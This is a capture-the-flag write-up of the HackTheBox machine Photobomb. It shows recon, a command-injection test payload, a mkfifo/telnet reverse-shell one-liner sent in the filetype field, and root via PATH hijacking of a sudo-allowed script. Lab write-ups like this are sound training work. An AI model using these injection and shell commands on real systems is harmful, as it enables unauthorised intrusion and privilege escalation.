Photobomb is an easy machine on HackTheBox which looks at command injection.
[RECON]
A simple Nmap scan to start:
$ nmap -A 10.10.11.182
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-24 11:00 BST
Nmap scan report for 10.10.11.182
Host is up (0.041s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
Here we found a HTTP server which redirects you to the address: http://photobomb.htb/, so I added it to my /etc/hosts folder and went to have a look.
This was the website that was found at that address, there wasn’t much on it, when you click the link it provides you with a simple login pop up. So the first thing I did was view the page source to see if there was any information disclosure on the page. In the page source there was an interesting JavaScript file named photobomb.js.
This JavaScript file seemed to simply contain the credentials to the login pop up.
[EXPLOITATION]
Once logged in, there was a bunch of images which you could download. After looking around for a bit there really wasn’t anything interesting at first glance, so I loaded up Burp Suite. With intercept on, I downloaded an image and saw that there were 3 fields which identified the photo you downloaded: photo, filetype and dimensions. It seemed possible that one of these fields is not properly sanitised and would allow for some command injection to take place. To check this, you can use the command:
;&sleep10
So I sent the download request to the repeater in Burp Suite and checked each field with that command. The field which returned with a delayed response is vulnerable (notice the 1,549 milliseconds in the bottom right).
With the knowledge that the filetype field is vulnerable to command injection, we can use this to get a reverse shell.
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.14.10 4444 0<$TF | sh 1>$TF
Adding this reverse shell into the filetype field, using ctrl -u to URL encode it and forwarding the request with a netcat listener gets us a shell with user access!
[PRIVILEGE ESCALATION]
To get root, let’s first check to see what our user can run.
sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
So we can run the file /opt/cleanup.sh as root without the need for a password, so let’s check it out.
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
This piece of script seems to move around log files and there is pretty simple vulnerability in it, it does not use an absolute path. This means that it is pretty easy to take advantage of the path traversal in this script. To do this, I created a file called ‘find’ in the /tmp folder, made it executable and then run the cleanup.sh file with the path specified.
echo bash > find
chmod +x find
sudo PATH=$PWD:$PATH /opt/cleanup.sh
id
uid=0(root) gid=0(root) groups=0(root)
This instantly gets you root access so you can find that flag!